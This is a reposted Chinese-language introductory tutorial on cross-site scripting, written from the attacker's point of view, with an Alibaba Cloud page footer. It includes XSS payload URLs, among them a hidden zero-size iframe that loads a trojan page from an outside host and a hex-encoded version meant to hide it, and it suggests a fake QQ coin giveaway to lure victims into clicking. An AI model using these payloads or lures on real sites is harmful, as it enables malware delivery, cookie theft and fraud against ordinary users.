專題研究第三期:XSS攻擊——跨站(引言篇)

來源:互聯網
上載者:User

sql注射像一把利劍直接插入目標的胸膛,犀利得鋒芒畢露。接下來我們一起來看看跨站。我把她比作“溫柔殺手”,一把隱在背後的匕首。

引言之 跨站利用思維導向

sql注射是直接針對具有sql注射漏洞的系統,我們的目標很明確。而跨站的目標是 client——用戶端。即訪問者。這決定了其隱蔽性。
如何去思考利用一個跨站漏洞?
站在訪問者的角度去測試就可以很好的嘗試到這個溫柔殺手的威力。

1 document.cookie 盜取cookie資訊
2 非法許可權提升
3 掛馬
4 間接傷害(借刀殺人)

--------------------------------------------------------------------------------------
第一點是最常見的利用方式,而第二點主要還是針對網站管理員來設定的陷阱。這個利用方式需要在擷取程式源碼的一定程度上才能有效利用。第三點也比較常見。而第四點可能不太明白。舉個例子:
假設 www.wang1.cn 網一存在跨站漏洞
其漏洞頁面是 thead.php
構造:http://www.wang1.cn/thead.php?id=<script>alert("你中招了!")</script>
那麼我們把這個URL發給別人的時候,別人得到一個彈出框
再惡意點:我們配置一個網馬頁面 http://www.mama.com/index.htm
於是我們這樣構造:http://www.wang1.cn/thead.php?id=<iframe src=http://www.mama.com/index.htm width=0 height=0></iframe>
嘿嘿,別人訪問這個地址的時候得到的卻是我們的網馬頁面。
事實上,我們的欺騙還可以更加隱蔽一點,對url進行重新編碼:

http://www.wang1.cn/thead.php?id=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%6D%61%2E%63%6F%6D%2F%69%6E%64%65%78%2E%68%74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E

這樣的話,一般人還真迷糊了。

問題來了:

誰會相信你直接存取你給的url地址呢?

答案:
信任構築於一個基本安全的環境。
假設 我們這個url的頭部是 http://www.163.com;www.qq.com。。。你還會懷疑嗎?
假如我們構建這樣一個頁面,慌稱qq最近有活動,贈送Q幣,然後大量發送精心構造的URL,有多少人會上當呢?

接下來的幾篇,我將逐一示範跨站技巧的一些運用。當然也歡迎網一會員提交文章。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.